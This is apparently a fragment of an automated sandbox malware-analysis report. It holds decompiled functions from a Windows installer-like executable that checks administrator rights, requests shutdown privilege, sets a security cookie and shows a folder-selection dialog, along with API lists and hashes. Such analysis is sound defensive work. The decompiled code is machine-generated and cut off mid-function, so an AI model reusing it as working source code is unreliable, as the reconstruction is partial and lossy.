                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00055CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00058B3E,00000104,00000000,?,?), ref: 00055DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00055E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00055EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00055F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00055FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00056008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 000560AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00051140,00000000,00000040,00000000), ref: 000561F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 000561F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: a2b7c4a682b7cb4ce2ecb42cdffb47802d966845ffd113adc3e8bd4769b197d0
                                                                                                                                                                                                                                                • Instruction ID: 947026c79e9573314feb681f274824a8853bf2be7f625ff98c28222136cd7766
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b7c4a682b7cb4ce2ecb42cdffb47802d966845ffd113adc3e8bd4769b197d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFD17831A04E445EEFB58B388C693FB3BF5AB16303F5441A9CC86D7191DA758E8E8B11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000518A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E000518A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x58004; // 0x5a679bd9
				_v8 = _t23 ^ _t53;
				_t25 =  *0x58128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00056CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E000517EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x58128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x58128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                                0x000518a3
                                                                                                                                                                                                                                                0x000518a3
                                                                                                                                                                                                                                                0x000518ab
                                                                                                                                                                                                                                                0x000518b2
                                                                                                                                                                                                                                                0x000518b5
                                                                                                                                                                                                                                                0x000518be
                                                                                                                                                                                                                                                0x000518c0
                                                                                                                                                                                                                                                0x000518c6
                                                                                                                                                                                                                                                0x000518c7
                                                                                                                                                                                                                                                0x000518ca
                                                                                                                                                                                                                                                0x000518cf
                                                                                                                                                                                                                                                0x000519c9
                                                                                                                                                                                                                                                0x000519d8
                                                                                                                                                                                                                                                0x000519d8
                                                                                                                                                                                                                                                0x000518df
                                                                                                                                                                                                                                                0x000519b8
                                                                                                                                                                                                                                                0x000519bd
                                                                                                                                                                                                                                                0x000519bf
                                                                                                                                                                                                                                                0x000519bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000519bd
                                                                                                                                                                                                                                                0x000518fa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051912
                                                                                                                                                                                                                                                0x000519aa
                                                                                                                                                                                                                                                0x000519ad
                                                                                                                                                                                                                                                0x000519b3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051927
                                                                                                                                                                                                                                                0x00051927
                                                                                                                                                                                                                                                0x00051932
                                                                                                                                                                                                                                                0x00051936
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x0005194c
                                                                                                                                                                                                                                                0x000519a2
                                                                                                                                                                                                                                                0x000519a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005196e
                                                                                                                                                                                                                                                0x00051970
                                                                                                                                                                                                                                                0x00051999
                                                                                                                                                                                                                                                0x0005199c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005199c
                                                                                                                                                                                                                                                0x00051972
                                                                                                                                                                                                                                                0x00051972
                                                                                                                                                                                                                                                0x00051975
                                                                                                                                                                                                                                                0x00051984
                                                                                                                                                                                                                                                0x00051985
                                                                                                                                                                                                                                                0x0005198a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005198c
                                                                                                                                                                                                                                                0x00051991
                                                                                                                                                                                                                                                0x00051996
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051996
                                                                                                                                                                                                                                                0x0005194c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000518DD), ref: 0005181A
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0005182C
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: AllocateAndInitializeSid.ADVAPI32(000518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000518DD), ref: 00051855
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: FreeSid.ADVAPI32(?,?,?,?,000518DD), ref: 00051883
                                                                                                                                                                                                                                                  • Part of subcall function 000517EE: FreeLibrary.KERNEL32(00000000,?,?,?,000518DD), ref: 0005188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000518EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 000518F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0005190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00051918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0005192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00051944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00051964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0005197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0005199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 000519A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000519AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: ced17d5f1614ed76ca0d243ef988a0b440ea2ce9aef9d55e21df9e19df1f1dea
                                                                                                                                                                                                                                                • Instruction ID: 38fb917ef910f8fb694bd5f6874438a6abf6a3ba0c8b502fce94c878ace9f41e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced17d5f1614ed76ca0d243ef988a0b440ea2ce9aef9d55e21df9e19df1f1dea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3314D71A0020AAFEB609FA5DC58BFFBBBCFF05302F104529E945E2190DB359949CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00051F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00051F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x59a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x58004; // 0x5a679bd9
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E000544B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00056CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E000544B9(0, 0x522, 0x51140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00051EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                                0x00051f90
                                                                                                                                                                                                                                                0x00051f90
                                                                                                                                                                                                                                                0x00051f93
                                                                                                                                                                                                                                                0x00051f98
                                                                                                                                                                                                                                                0x00051fa4
                                                                                                                                                                                                                                                0x00051fa7
                                                                                                                                                                                                                                                0x00051fc5
                                                                                                                                                                                                                                                0x00051fcd
                                                                                                                                                                                                                                                0x00051fdb
                                                                                                                                                                                                                                                0x00051ee5
                                                                                                                                                                                                                                                0x00051eea
                                                                                                                                                                                                                                                0x00051ef1
                                                                                                                                                                                                                                                0x00051ef4
                                                                                                                                                                                                                                                0x00051f0c
                                                                                                                                                                                                                                                0x00051f2e
                                                                                                                                                                                                                                                0x00051f3a
                                                                                                                                                                                                                                                0x00051f46
                                                                                                                                                                                                                                                0x00051f4d
                                                                                                                                                                                                                                                0x00051f58
                                                                                                                                                                                                                                                0x00051f60
                                                                                                                                                                                                                                                0x00051f61
                                                                                                                                                                                                                                                0x00051f62
                                                                                                                                                                                                                                                0x00051f75
                                                                                                                                                                                                                                                0x00051f80
                                                                                                                                                                                                                                                0x00051f77
                                                                                                                                                                                                                                                0x00051f77
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051f77
                                                                                                                                                                                                                                                0x00051f64
                                                                                                                                                                                                                                                0x00051f64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051f64
                                                                                                                                                                                                                                                0x00051f0e
                                                                                                                                                                                                                                                0x00051f0e
                                                                                                                                                                                                                                                0x00051f13
                                                                                                                                                                                                                                                0x00051f13
                                                                                                                                                                                                                                                0x00051f14
                                                                                                                                                                                                                                                0x00051f14
                                                                                                                                                                                                                                                0x00051f16
                                                                                                                                                                                                                                                0x00051f17
                                                                                                                                                                                                                                                0x00051f1a
                                                                                                                                                                                                                                                0x00051f1f
                                                                                                                                                                                                                                                0x00051f1f
                                                                                                                                                                                                                                                0x00051f86
                                                                                                                                                                                                                                                0x00051f8f
                                                                                                                                                                                                                                                0x00051fcf
                                                                                                                                                                                                                                                0x00051fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051fd3
                                                                                                                                                                                                                                                0x00051fa9
                                                                                                                                                                                                                                                0x00051fb4
                                                                                                                                                                                                                                                0x00051fbb
                                                                                                                                                                                                                                                0x00051fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051fc3
                                                                                                                                                                                                                                                0x00051f9a
                                                                                                                                                                                                                                                0x00051f9a
                                                                                                                                                                                                                                                0x00051fa2
                                                                                                                                                                                                                                                0x00051fd9
                                                                                                                                                                                                                                                0x00051fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00051EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00051F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00051FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: fc5e04e823e1e788c84ad1b09d6b4c5906d4753f3dd9396d09790d0383f48f93
                                                                                                                                                                                                                                                • Instruction ID: 9e967640ab2ad72ddcea9ce18dfb22b486d1fbfedb8e402bf53fb3e94880623e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc5e04e823e1e788c84ad1b09d6b4c5906d4753f3dd9396d09790d0383f48f93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21E471B40305ABEB605BA19C4AFFF3AB8EB85B13F100128FE02E60C1D77888089765
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00057155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00057155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x58004; // 0x5a679bd9
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x58004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x58004 = _t39;
				}
				_t37 =  !_t36;
				 *0x58008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                                0x0005715d
                                                                                                                                                                                                                                                0x00057161
                                                                                                                                                                                                                                                0x00057165
                                                                                                                                                                                                                                                0x00057178
                                                                                                                                                                                                                                                0x00057182
                                                                                                                                                                                                                                                0x0005718e
                                                                                                                                                                                                                                                0x00057197
                                                                                                                                                                                                                                                0x000571a0
                                                                                                                                                                                                                                                0x000571b1
                                                                                                                                                                                                                                                0x000571b8
                                                                                                                                                                                                                                                0x000571c4
                                                                                                                                                                                                                                                0x000571c7
                                                                                                                                                                                                                                                0x000571cb
                                                                                                                                                                                                                                                0x000571d5
                                                                                                                                                                                                                                                0x000571da
                                                                                                                                                                                                                                                0x000571da
                                                                                                                                                                                                                                                0x000571dc
                                                                                                                                                                                                                                                0x000571dc
                                                                                                                                                                                                                                                0x000571e2
                                                                                                                                                                                                                                                0x000571e5
                                                                                                                                                                                                                                                0x000571ee

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00057182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00057191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0005719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000571A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 000571B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 0efe0a41627acca3237cc29d35ae42bdef0082e2570a40c3fe5d1b395773805a
                                                                                                                                                                                                                                                • Instruction ID: 5ea035a603c3ac5b04d2035f13a244db3d4e136a96cdc31d60884fc89bb9f85e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0efe0a41627acca3237cc29d35ae42bdef0082e2570a40c3fe5d1b395773805a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2114C71E01708DFDB50DFB8EA48A9FBBF4EF08312FA14955D805E7250EA389A049B49
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00056CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                                0x00056cf7
                                                                                                                                                                                                                                                0x00056d00
                                                                                                                                                                                                                                                0x00056d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00056E26,00051000), ref: 00056CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00056E26,?,00056E26,00051000), ref: 00056D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00056E26,00051000), ref: 00056D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00056E26,00051000), ref: 00056D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: b630ee067fa1bf218faf736a4155dcf249d62b4c28a578b5dd814698f0aa587e
                                                                                                                                                                                                                                                • Instruction ID: baceed688d60b56487bfe997f943506a6714c6552e0a0f14060c7e8829f4d7e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b630ee067fa1bf218faf736a4155dcf249d62b4c28a578b5dd814698f0aa587e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D0C932200B08BBFB002BF1EC0CA5B3F28EB4A213F444100F31982020CA3A54518B5A
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00053210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E000543D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x59a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x591e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E000544B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x591e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x591e5 - 3;
						if(_t49 - 0x591e5 < 3) {
							goto L32;
						}
						_t24 =  *0x591e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x591e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0005658A(0x591e4, 0x104, 0x51140);
								_t27 = E000558C8(0x591e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x591e4 - 0x5c;
									if( *0x591e4 != 0x5c) {
										L30:
										_t30 = E0005597D(0x591e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x591e5 - 0x5c;
									if( *0x591e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E000544B9(_t64, 0x54a, 0x591e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x591e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x591e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x591e4 - 0x5c;
						if( *0x591e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x59124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
